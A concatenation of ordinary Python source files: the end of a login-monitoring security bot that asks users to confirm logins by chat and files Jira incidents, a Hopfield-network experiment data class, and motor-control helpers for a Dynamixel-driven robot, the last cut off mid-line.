MAX_UNKNOWN_USER_ATTEMPTS_NET\n else:\n max_attempts = MAX_USER_ATTEMPTS_NET\n\n if count_user >= max_attempts:\n log_event.descr = MSG_ADMIN_LOGIN_FAILED\n suspicious_user = parse_username(usertype=NETWORK, user_login=log_event.username)\n if suspicious_user in USERS.network.logins:\n LogEventsQueue.append(log_event)\n else:\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER,\n log_event.login,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n is_user_alarm[user_device] = True\n logger.debug(f'{tac_queue_checker.__name__}. 
Log Event: {log_event.show()}')\n\n\n# проверяем на sql инъекции аргументы в команде /reg\ndef verify_sql_inj(str_from_chat):\n pattern_special_symbols = '[()\\[\\]\\'=,{};\"/]'\n if re.search(pattern_special_symbols, str_from_chat):\n return False\n pattern_sql_commands = re.compile(\n '(select|union|where|substr|when|from|limit|then|else|match|true|false|drop|create)')\n if pattern_sql_commands.search(str_from_chat.lower()):\n return False\n return True\n\n\ndef new_user_registration(event, usertype, userlogin):\n global USERS\n if userlogin:\n login_username = userlogin\n else:\n login_username = event.from_chat.split('@')[0].strip()\n logger.info(f'New registration: {login_username}, from: {event.from_chat}')\n new_user = User(usertype, login_username, event.from_chat)\n USERS += new_user\n text = '{}: {} в {} боте'.format(MSG_USER_REG, login_username, usertype)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n write_user_db(new_user)\n logger.info(f'Add new user: {login_username}')\n\n\ndef update_user_registration(event, usertype, userlogin):\n user: User = USERS.get_user(usertype=usertype, chat_id=event.from_chat)\n if userlogin != user:\n logger.info(f'Change registration: {user.login}')\n new_user = User(usertype, userlogin, event.from_chat)\n USERS[user] = userlogin\n write_user_db(new_user, 'update')\n text = '{}: {}'.format(MSG_USER_CHANGE_LOGIN, userlogin)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n\n\ndef bot_cmd_reg_handler(bot, event):\n (cmd, usertype, userlogin) = event.text.split(\" \")\n logger.info(f'New user registration: {usertype[1:]} : {userlogin} : {event.from_chat}')\n if not verify_sql_inj(userlogin):\n text = f'From: {event.from_chat}\\n Подозрительный запрос на регистрацию: {event.text}'\n send_msg(USER_ADMIN_CHAT_ID, text)\n return False\n chat_username, user_domain = event.from_chat.split('@')\n if user_domain not in MAIL_DOMAIN:\n logger.warning(f'Невалидный домен в chat_id: {chat_username}@{user_domain}')\n return False\n\n logger.info(f'{usertype} <<>> {event.from_chat} <<>> {USERS.get_user(usertype=usertype, chat_id=event.from_chat)}')\n\n if USERS.get_user(usertype=usertype, chat_id=event.from_chat) and not userlogin:\n user: User = USERS.get_user(usertype=usertype, chat_id=event.from_chat)\n text = '{}: {}'.format(MSG_USER_EXIST, user.login)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n elif not USERS.get_user(usertype=usertype, chat_id=event.from_chat):\n new_user_registration(event, usertype, userlogin)\n elif userlogin:\n update_user_registration(event, usertype, userlogin)\n\n\n# обрабатываем команды для бота, вводимые пользователем в чат\ndef bot_cmd_handler(bot, event):\n global BOT_ALIVE\n CMD_CHAT = namedtuple(\"CMD_CHAT\", \"cmd command_body arg1 args_next\")\n\n template_cmd = re.compile(r\"/(?P(?:(\\S+)))\\s*\"\n r\"(?P(?:(\\S+|)))\\s*\"\n r\"(?P(?:(\\S+|)))\\s*\"\n r\"(?P(?:(\\S+|\\s+|)+))\", re.VERBOSE)\n match = template_cmd.match(event.text)\n if not match:\n return False\n cmd_from_chat = CMD_CHAT(\n cmd=match.groupdict()['cmd'],\n command_body=match.groupdict()['command_body'],\n arg1=match.groupdict()['arg1'],\n args_next=match.groupdict()['args_next']\n )\n logger.debug(f'Command: {format(event.text)}')\n if cmd_from_chat.cmd == \"help\":\n send_msg(event.from_chat, 'Usage for registration:\\n /reg network|server userlogin')\n elif cmd_from_chat.cmd == \"show\" and cmd_from_chat.arg1 == 'users':\n show_users = ('{0:%s}' % 
cmd_from_chat.command_body).format(USERS)\n send_msg(USER_ADMIN_CHAT_ID, show_users)\n elif cmd_from_chat.cmd == \"ping\":\n text = str(BOT_ALIVE)\n send_msg(USER_ADMIN_CHAT_ID, text)\n else:\n BOT_ALIVE = False\n text = 'Бот запущен ...'\n send_msg(event.from_chat, text)\n return True\n\n\n# если есть Событие - бот пишет юзеру запрос (если юзер известен), или пишет в админскую чат-группу (если юзер Unknown)\ndef start_dlg():\n logger.debug(f'{start_dlg.__name__}. LEN LogEventsQueue: {len(LogEventsQueue)}')\n\n while LogEventsQueue:\n log_event : EventLogClass = LogEventsQueue.popleft()\n logger.debug(f'{start_dlg.__name__}. Username: {log_event.username}')\n if log_event.username is not UNKNOWN_USER:\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_USER_PING, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n logger.debug(f'{start_dlg.__name__}. Username: {u}')\n send_msg(u.chat_id, text, with_buttons=True)\n current_date = datetime.now()\n log_event.set_request(current_date)\n log_event.set_hash(text)\n RequestEventsQueue.append(log_event)\n elif log_event.username is UNKNOWN_USER:\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(MSG_ADMIN_UNKNOWN_USER, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n log_event.descr = MSG_ADMIN_UNKNOWN_USER\n current_date = datetime.now()\n log_event.set_request(current_date)\n AlarmEventsQueue.append(log_event)\n check_alarm_queue()\n return True\n\n\n# обработчик ответов юзера для бота\n# если ответ - ДА, ничего не делаем, если НЕТ - создаём jira-инц\ndef reply_bot(bot, event, hash_log):\n logger.debug(f'{reply_bot.__name__}')\n global BOT_ALIVE\n if event.text.split(' ')[0] in BOT_COMMAND_LIST:\n return False\n if event.text[:1] == '/' and event.text.split(' ')[0] not in BOT_COMMAND_LIST:\n text = \"Мне не знакома команда [ \" + event.text + \" ] ...\"\n send_msg(event.from_chat, text)\n return False\n\n yes_list = ['yes', 'да', 'ага', 'ок', 'ok']\n no_list = ['no', 'нет']\n\n temp_queue = deque()\n temp_queue.extend(RequestEventsQueue)\n while temp_queue:\n log_event = temp_queue.popleft()\n user: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], chat_id=event.from_chat)\n\n if user:\n username = user.login\n else:\n username = UNKNOWN_USER\n\n logger.debug(f'LEN RequestEventsQueue: {len(RequestEventsQueue)}')\n if username == log_event.username:\n if event.text.lower() in yes_list:\n text = 'ok'\n logger.info(f'Chat: {event.from_chat}. 
Reply: {text}')\n send_msg(event.from_chat, text)\n log_event.set_reply()\n log_event.set_alarm(False)\n RequestEventsQueue.remove(log_event)\n return True\n elif event.text.lower() in no_list:\n log_event.set_reply()\n log_event.set_alarm(True)\n RequestEventsQueue.remove(log_event)\n log_event.descr = MSG_ADMIN_HACK_LOGIN\n AlarmEventsQueue.append(log_event)\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n{}'.format(MSG_ADMIN_HACK_LOGIN, log_event.username,\n log_event.date.strftime(\n '%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n logger.info(text)\n send_msg(event.from_chat, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n check_alarm_queue()\n return True\n else:\n text = 'Варианты ответа: {} или {}'.format(str(yes_list), str(no_list))\n logger.info(text)\n send_msg(event.from_chat, text)\n return False\n\n # если боту написали что то ещё (не ответ на запрос)\n user_domain = event.from_chat.split('@')[1].strip()\n if user_domain not in MY_DOMAIN:\n new_username = event.from_chat.split('@')[0].strip()\n logger.warning(f'User is not in MRG/VK domain: {new_username}@{user_domain}')\n return False\n if not USERS.get_user(usertype=NETWORK, chat_id=event.from_chat) \\\n and not USERS.get_user(usertype=SERVER, chat_id=event.from_chat):\n text = f'Вы можете зарегистрироваться в боте через команду: /reg {NETWORK}|{SERVER} userlogin'\n secure_bot.send_text(event.from_chat, text)\n return True\n\n\n# проверяем истёк ли таймаут юзера REPLY_TIMEOUT для ответа на запрос бота,\n# если истёк - переносим Событие из очереди Request в очередь Alarm\n@_safe_queue\ndef check_event_timeout():\n temp_queue = deque()\n temp_queue.extend(RequestEventsQueue)\n while temp_queue:\n logger.debug(f'{check_event_timeout.__name__}. LEN RequestEventsQueue: {len(RequestEventsQueue)}')\n log_event = temp_queue.popleft()\n current_date = datetime.now()\n delta_time = current_date - log_event.request_time\n\n if log_event.request and not log_event.second_request and delta_time.seconds > int(REPLY_TIMEOUT * 0.7):\n text = '{}: \"{}\" \\n\\n{}\\nHost: {}\\nSource IP: {}\\n\\n{}'.format(\"RESEND\\n\" + MSG_USER_PING, log_event.login,\n log_event.date.strftime('%d %B - %H:%M:%S'),\n log_event.host, log_event.src_ip,\n log_event.text)\n\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n send_msg(u.chat_id, text)\n log_event.second_request = True\n elif log_event.request and delta_time.seconds > REPLY_TIMEOUT:\n text = f'{MSG_ADMIN_ALARM_TIMEOUT}.\\n\\n{log_event.text}'\n u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n send_msg(u.chat_id, text)\n send_msg(USER_ADMIN_CHAT_ID, text)\n RequestEventsQueue.remove(log_event)\n AlarmEventsQueue.append(log_event)\n check_alarm_queue()\n return True\n\n\n# создаём jira-инциденты для событий в очереди Alarm\n# ссылку на jira-инц отправляем юзеру (если он известен), в админскую чат-группу и в Телеграм чат\n@_safe_queue\ndef check_alarm_queue():\n logger.debug(f'{check_alarm_queue.__name__}. 
LEN AlarmEventsQueue: {len(AlarmEventsQueue)}')\n\n    while AlarmEventsQueue:\n        log_event = AlarmEventsQueue.popleft()\n        task_id = create_jira_issue(log_event)\n        text = f\"{MSG_ADMIN_ALARM}: \" \\\n               f\"{JIRA_URL}{task_id}\\n\" \\\n               f\"{log_event.date.strftime('%d %B - %H:%M:%S')}\\n\" \\\n               f\"Host: {log_event.host}\\n\" \\\n               f\"Source IP: {log_event.src_ip}\\n\" \\\n               f\"{log_event.text}\"\n        if log_event.username is not UNKNOWN_USER:\n            u: User = USERS.get_user(ALARM_TYPES[log_event.alarm_type], login=log_event.username)\n            send_msg(u.chat_id, text)\n\n        send_msg(USER_ADMIN_CHAT_ID, text)\n        text_to_chat = 'Created issue {}{}: {}: User: {}, Host: {}, Source: {}'.format(JIRA_URL, task_id, log_event.descr,\n                                                                                      log_event.login, log_event.host,\n                                                                                      log_event.src_ip)\n        send_msg(MYTEAM_CRIT_CHAT, text_to_chat)\n        logger.info(f'\\nCreate Jira Issue: {JIRA_URL}, Task: {task_id}\\n')\n    return True\n\n\ndef create_jira_issue(log_event):\n    user = log_event.login\n    if log_event.username is UNKNOWN_USER:\n        user = '{} ({})'.format(log_event.login, 'unknown user')\n    time_issue_created_iso8601 = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.0+0300\")\n    header = \"{} (user: {})\".format(log_event.descr, log_event.login)\n    descr = \"User: {}\\nHostname: {}\\nSource: {}\\nType: {}\\n{}\".format(user, log_event.host, log_event.src_ip,\n                                                                      log_event.alarm_type,\n                                                                      log_event.text)\n    priority = {'Blocking': '1', 'Critical': '2', 'Major': '3', 'Minor': '4', 'Trivial': '5'}\n    issue_hash = hashlib.md5(header.encode()).hexdigest()\n\n    issue_dict = {\n        'project': {'key': 'INC'},\n        'priority': {'id': priority[JIRA_PRIORITY]},\n        'issuetype': {'name': 'Network'},\n        'summary': header,\n        'description': descr,\n        # Trigger ID\n        \"customfield_27407\": 'Security Incident',\n        \"customfield_27404\": time_issue_created_iso8601,\n        # Hostname\n        \"customfield_27409\": log_event.host,\n        \"customfield_27408\": issue_hash,\n        \"customfield_27406\": 'noc_secure_bot'\n    }\n\n    jira_options = {'server': CONFIG['jira']['server']}\n    jira_consumer_key = CONFIG['jira']['consumer_key']\n    jira_oauth_token_secret = CONFIG['jira']['oauth_token_secret']\n    jira_oauth_token = CONFIG['jira']['oauth_token']\n    jira_oauth_key_path = CONFIG['jira']['jira_rsa_key_path']\n    data = ''\n\n    try:\n        with open(jira_oauth_key_path, 'r') as f:\n            data = f.read()\n    # if unable to read jira oauth rsa key\n    except Exception as e:\n        text = f'ERROR: {create_jira_issue.__name__}. {e}'\n        logger.error(e)\n        send_msg(USER_ADMIN_CHAT_ID, text)\n        os._exit(-1)\n\n    private_key = data.strip()\n\n    oauth = {'access_token': jira_oauth_token, 'consumer_key': jira_consumer_key,\n             'access_token_secret': jira_oauth_token_secret, 'key_cert': private_key}\n    try:\n        jira = JIRA(options=jira_options, oauth=oauth)\n        new_issue = jira.create_issue(fields=issue_dict)\n        jira.kill_session()\n        logger.debug(f'{create_jira_issue.__name__}')\n        return new_issue.key\n    # can't access jira server\n    except Exception as e:\n        text = f'ERROR: {create_jira_issue.__name__}. 
{e}'\n        logger.error(e)\n        send_msg(USER_ADMIN_CHAT_ID, text)\n\n\n# read the registered-user database\ndef read_user_db(db_table):\n    users_db = dict()\n    try:\n        conn = sqlite3.connect(DB_FILENAME)\n        cursor = conn.cursor()\n        query = 'SELECT * FROM {}'.format(db_table)\n        cursor.execute(query)\n        for row in cursor:\n            users_db[row[0]] = row[1]\n        conn.commit()\n        cursor.close()\n        conn.close()\n    except sqlite3.Error as e:\n        text = f'ERROR: cannot get [users] from DB: {e}'\n        logger.error(text)\n        send_msg(USER_ADMIN_CHAT_ID, text)\n        return False\n    logger.debug(f'{read_user_db.__name__}')\n    return users_db\n\n\n# write/update a user in the registered-user database\ndef write_user_db(new_user, mode='write'):\n    query_db = {'write': 'INSERT INTO %s (%s, %s) VALUES (?, ?)',\n                'update': 'UPDATE %s SET %s = ? WHERE %s = ?'}\n    chat_id = 'chat_id'\n    login = 'login'\n    db_table = DB_TABLE[new_user.usertype]\n    new_login = new_user.login\n    new_chat_id = new_user.chat_id\n    try:\n        conn = sqlite3.connect(DB_FILENAME)\n        cursor = conn.cursor()\n        cursor.execute(query_db[mode] % (db_table, login, chat_id), (new_login, new_chat_id,))\n        conn.commit()\n        cursor.close()\n        conn.close()\n    except sqlite3.Error as e:\n        text = f'{write_user_db.__name__}. {e}'\n        logger.error(e)\n        send_msg(USER_ADMIN_CHAT_ID, text)\n    logger.debug(f'{write_user_db.__name__}')\n\n\ndef read_src_nets():\n    logger.info(f'{read_src_nets.__name__}')\n    global SRC_VALID_NETS\n    try:\n        with open(NETWORKS_FILENAME, 'r', encoding='utf8') as f:\n            for line in f:\n                line = line.split('#', 1)[0].strip()\n                if line:\n                    SRC_VALID_NETS.append(line)\n    except Exception as e:\n        text = f'ERROR: cannot read SOURCE NETWORK file: {e}'\n        logger.error(e)\n        send_msg(USER_ADMIN_CHAT_ID, text)\n\n\n# MAIN #\ndef main():\n    logger.info('Secure bot started...')\n    global USERS, USERS_DEFAULT\n    USERS.update_db(NETWORK, USERS_DEFAULT)\n    USERS.update_db(SERVER, USERS_DEFAULT)\n    USERS.update_db(NETWORK, read_user_db(DB_TABLE_NETWORK))\n    USERS.update_db(SERVER, read_user_db(DB_TABLE_SERVER))\n\n    logger.debug(f'User network list: {USERS.get_users(usertype=NETWORK)}')\n    logger.debug(f'User server list: {USERS.get_users(usertype=SERVER)}')\n\n    secure_bot.dispatcher.add_handler(CommandHandler(command='reg', callback=bot_cmd_reg_handler))\n    secure_bot.dispatcher.add_handler(UnknownCommandHandler(callback=bot_cmd_handler))\n    secure_bot.dispatcher.add_handler(MessageHandler(callback=reply_bot))\n    secure_bot.dispatcher.add_handler(BotButtonCommandHandler(callback=buttons_answer_cb))\n    secure_bot.start_polling()\n\n    db_client = Client(CLICKHOUSE_HOST, port=CLICKHOUSE_PORT)\n    query = DBQuery(\"NetworkHostListWithIP\",\n                    ['HostName', 'HostState', 'IP', 'HardwareModel_Name', 'NetworkRoles', 'OrgUnitName'],\n                    \"SELECT * FROM\")\n\n    log_template_alarm_list = [\n        CHECK_NETWORK_TEMPLATE,\n        CHECK_SERVER_FAILED_LOGIN,\n        CHECK_SERVER_SOURCE_IP_TEMPLATE]\n    log_template_info_list = [CHECK_SERVER_SUCCESS_LOGIN]\n\n    schedule.every(DB_REQUEST_INTERVAL).hours.do(read_src_nets)\n    schedule.every(DB_REQUEST_INTERVAL).hours.do(clone_cmdb_to_local)\n    schedule.every(DB_REQUEST_INTERVAL).hours.do(read_db, query)\n    schedule.every(PARSE_LOG_INTERVAL).seconds.do(parse_log,\n                                                  db_client,\n                                                  log_template_alarm_list,\n                                                  log_template_info_list,\n                                                  [ALARM_TYPES[NETWORK], ALARM_TYPES[SERVER]])\n    schedule.every(PARSE_LOG_INTERVAL).seconds.do(tac_queue_checker)\n    schedule.every(PARSE_LOG_INTERVAL).seconds.do(secure_queue_checker)\n    schedule.every(PARSE_LOG_INTERVAL).seconds.do(source_queue_checker)\n    
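# note (descriptive comment, not in the original source): the remaining per-interval jobs drain the pipeline in order: user dialogue, reply-timeout check, jira alarm creation\n    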
schedule.every(PARSE_LOG_INTERVAL).seconds.do(start_dlg)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(check_event_timeout)\n schedule.every(PARSE_LOG_INTERVAL).seconds.do(check_alarm_queue)\n schedule.run_all()\n\n try:\n while 1:\n try:\n schedule.run_pending()\n except Exception as e:\n logger.error(f'Unknown Error: {e}')\n os._exit(-1)\n sleep(SCHEDULE_TIMEOUT)\n except KeyboardInterrupt as err:\n db_client.disconnect()\n raise KeyboardInterrupt(err)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt as err:\n logger.info('Terminate script process by Ctrl-C')\n except Exception as err:\n logger.critical(f'Unknown exception: {err.with_traceback(sys.exc_info()[2])}')\n os._exit(-1)\n","sub_path":"sec_bot.py","file_name":"sec_bot.py","file_ext":"py","file_size_in_byte":47893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"51110847","text":"import numpy as np\nimport scipy.stats as sp\nimport matplotlib.pyplot as plt\n\nclass Data:\n \"\"\"Implements the data structures to handle results of an experiment.\n Elements (error, capacity, ...) can be stored\n for a particular value (number of patterns, flip ratio, ...)\n and a particular trial (network realisation)\n When a new element is added, the mean and error bar over all trials is updated\n\n Attributes:\n data (numpy.ndarray): Array of stored elements (number_of_values x number_of_trials)\n meanData (numpy.ndarray): Array of means of elements (averaged over all trials)\n errorBars (numpy.ndarray): Array of standard errors of the means\n \"\"\"\n\n def __init__(self, nValues, nTrials):\n \"\"\" Initialize an experiment\n Plot an empty figure\n \"\"\"\n self.data = np.zeros((nValues, nTrials))\n self.meanData = np.zeros(nValues)\n self.errorBars = np.zeros(nValues)\n plt.figure()\n\n def update(self, element, index, trial):\n \"\"\"Updates data structures with a new element\n\n Args:\n element (float): New element\n index (int): Index of the current value tested\n trial (int): Index of the current trial\n \"\"\"\n self.data[index, trial] = element\n # Recompute corresponding mean and error of the mean (considering the new element)\n self.meanData[index] = np.mean(self.data[index, :trial+1], axis=0)\n if trial != 0:\n \tself.errorBars[index] = sp.sem(self.data[index, :trial+1], axis=0, ddof=1)\n else:\n \tself.errorBars[index] = 0\n # http://stackoverflow.com/questions/27600207/why-does-numpy-std-give-a-different-result-to-matlab-std\n\n def clearPlot(self, xlim = [0, 1], ylim = [0, 1], title = 'Title', xlabel = 'x', ylabel = 'y'):\n plt.clf()\n plt.rcParams.update({'font.size': 15})\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title(title, fontsize = 15)\n plt.xlabel(xlabel, fontsize = 15)\n plt.ylabel(ylabel, fontsize = 15)\n plt.tick_params(axis='both', which='major', labelsize=12)\n\n def updatePlot(self, values, index):\n \"\"\" Plots meanData in function of the values with error bars of length 2*errorBars\n Values with index from 0 to index (included) are plotted in black\n Values with index after index+1 (included) are plotted in light grey\n \"\"\"\n plt.errorbar(values[:index+1], self.meanData[:index+1], xerr=0, yerr=(self.errorBars[:index+1]), color='k', alpha=1.0)\n plt.errorbar(values[index+1:], self.meanData[index+1:], xerr=0, yerr=(self.errorBars[index+1:]), color='k', alpha=0.2)\n plt.draw()\n plt.pause(0.0001)\n\n def getMeans(self):\n return (self.meanData, 
self.errorBars)\n","sub_path":"customHopfieldNetwork/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"59713026","text":"import os\n\nif os.name == 'nt':\n import msvcrt\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys, tty, termios\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\nfrom dynamixel_sdk import *\n\nfrom MFRv2_Constants import *\n\n# Initialize PortHandler instance & Set the port path\nportHandler = PortHandler(DEVICENAME)\n\n\n# Initialize PacketHandler instance & Set the protocol version\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\n# Open port\nif portHandler.openPort():\n print(\"Succeeded to open the port\")\nelse:\n print(\"Failed to open the port\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n\n# Set port baudrate\nif portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\nelse:\n print(\"Failed to change the baudrate\")\n print(\"Press any key to terminate...\")\n getch()\n quit()\n\n\n\n#motor control functions:\n\ndef enableTorque(id):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, XL_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # quit()\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % id)\n\ndef disableTorque(id):\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, id, XL_TORQUE_ENABLE, TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # quit()\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully disconnected\" % id)\n\ndef atPosition(goal, curr):\n if(abs(goal - curr) > DXL_MOVING_STATUS_THRESHOLD):\n return False\n return True\n\ndef atPositionCustom(goal, curr, threshold):\n if(abs(goal - curr) > threshold):\n return False\n return True\n\ndef getPos(id): #get position of motor\n # currPos, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_POSITION)\n currPos = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_POSITION)[0]\n\n # if dxl_comm_result != COMM_SUCCESS:\n # print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n # elif dxl_error != 0:\n # print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n\n # ------- Eric Lara's patch for a read bug (error with negative integers) -----------\n dxl_present_16Byte_1 = (currPos & 0xFFFF)\n dxl_present_16Byte_2 = (currPos >> 16) & 0xFFFF\n\n # print('[%s, %s]' % (dxl_present_16Byte_1, dxl_present_16Byte_2) )\n\n if dxl_present_16Byte_1 < dxl_present_16Byte_2:\n multiply = 65535 - dxl_present_16Byte_2\n currPos = (dxl_present_16Byte_1 - 65535) - multiply*65535\n\n\t# -------------------------------------------------------------------------\n\n return currPos\n\ndef getVel(id):\n currVel, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_PRESENT_VELOCITY)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif 
dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n return currVel\n\ndef getPosGoal(id):\n goalPos = packetHandler.read4ByteTxRx(portHandler, id, XL_GOAL_POSITION)[0]\n\n # ------- Eric Lara's patch for a read bug (error with negative integers) -----------\n dxl_present_16Byte_1 = (goalPos & 0xFFFF)\n dxl_present_16Byte_2 = (goalPos >> 16) & 0xFFFF\n\n # print('[%s, %s]' % (dxl_present_16Byte_1, dxl_present_16Byte_2) )\n\n if dxl_present_16Byte_1 < dxl_present_16Byte_2:\n multiply = 65535 - dxl_present_16Byte_2\n goalPos = (dxl_present_16Byte_1 - 65535) - multiply*65535\n\n\t# -------------------------------------------------------------------------\n\n return goalPos\n\ndef getVelGoal(id):\n currVel, dxl_comm_result, dxl_error = packetHandler.read4ByteTxRx(portHandler, id, XL_GOAL_VELOCITY)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"getPos Error: %s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\n return currVel\n\ndef getProfileVelocity(id):\n return packetHandler.read4ByteTxRx(portHandler, id, XL_PROFILE_VELOCITY)[0]\n\ndef switchControlMode(id, mode):\n print(\"Switching Motor \", id, \" to: \", mode)\n disableTorque(id)\n packetHandler.write1ByteTxRx(portHandler, id, XL_OPERATING_MODE, mode)\n enableTorque(id)\n\ndef switchControlModeAllLegs(mode):\n switchControlMode(RF_LEG_ID, mode)\n switchControlMode(RM_LEG_ID, mode)\n switchControlMode(RB_LEG_ID, mode)\n switchControlMode(LF_LEG_ID, mode)\n switchControlMode(LM_LEG_ID, mode)\n switchControlMode(LB_LEG_ID, mode)\n\ndef moveMotorPos(id, pos):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler,id, XL_GOAL_POSITION, pos)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n\ndef moveMotorVel(id, vel):\n dxl_comm_result, dxl_error = packetHandler.write4ByteTxRx(portHandler,id, XL_GOAL_VELOCITY, vel)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error)) \n\ndef moveTail(pitchPos, yawPos):\n # return (moveMotor(TAIL_YAW_ID, yawPos) and moveMotor(TAIL_PITCH_ID, pitchPos))\n moveMotorPos(TAIL_YAW_ID, yawPos)\n moveMotorPos(TAIL_PITCH_ID, pitchPos)\n return (tailAtPos())\n\ndef moveWings(lPos, rPos):\n # return (moveMotor(L_WING_ID, lPos) and moveMotor(R_WING_ID, rPos))\n moveMotorPos(L_WING_ID, lPos)\n moveMotorPos(R_WING_ID, rPos)\n # return (wingsAtPos())\n\ndef tailAtPos():\n return (atPosition(getPosGoal(TAIL_YAW_ID), getPos(TAIL_YAW_ID)) and atPositionCustom(getPosGoal(TAIL_PITCH_ID), getPos(TAIL_PITCH_ID), TAIL_MOVING_THRESHOLD))\n\ndef wingsAtPos():\n return (atPosition(getPosGoal(L_WING_ID), getPos(L_WING_ID)) and atPosition(getPosGoal(R_WING_ID), getPos(R_WING_ID)))\n\ndef legsAtPos():\n return (atPosition(getPosGoal(RF_LEG_ID), getPos(RF_LEG_ID)) and atPosition(getPosGoal(RM_LEG_ID), getPos(RM_LEG_ID)) and atPosition(getPosGoal(RB_LEG_ID), getPos(RB_LEG_ID)) and atPosition(getPosGoal(LF_LEG_ID), getPos(LF_LEG_ID)) and atPosition(getPosGoal(LM_LEG_ID), getPos(LM_LEG_ID)) and atPosition(getPosGoal(LB_LEG_ID), getPos(LB_LEG_ID)))\n\ndef moveLegsFromHome(pos):\n moveMotorPos(RF_LEG_ID, RF_LEG_HOME + pos)\n moveMotorPos(RM_LEG_ID, RM_LEG_HOME + pos)\n moveMotorPos(RB_LEG_ID, RB_LEG_HOME + pos)\n moveMotorPos(LF_LEG_ID, LF_LEG_HOME + 
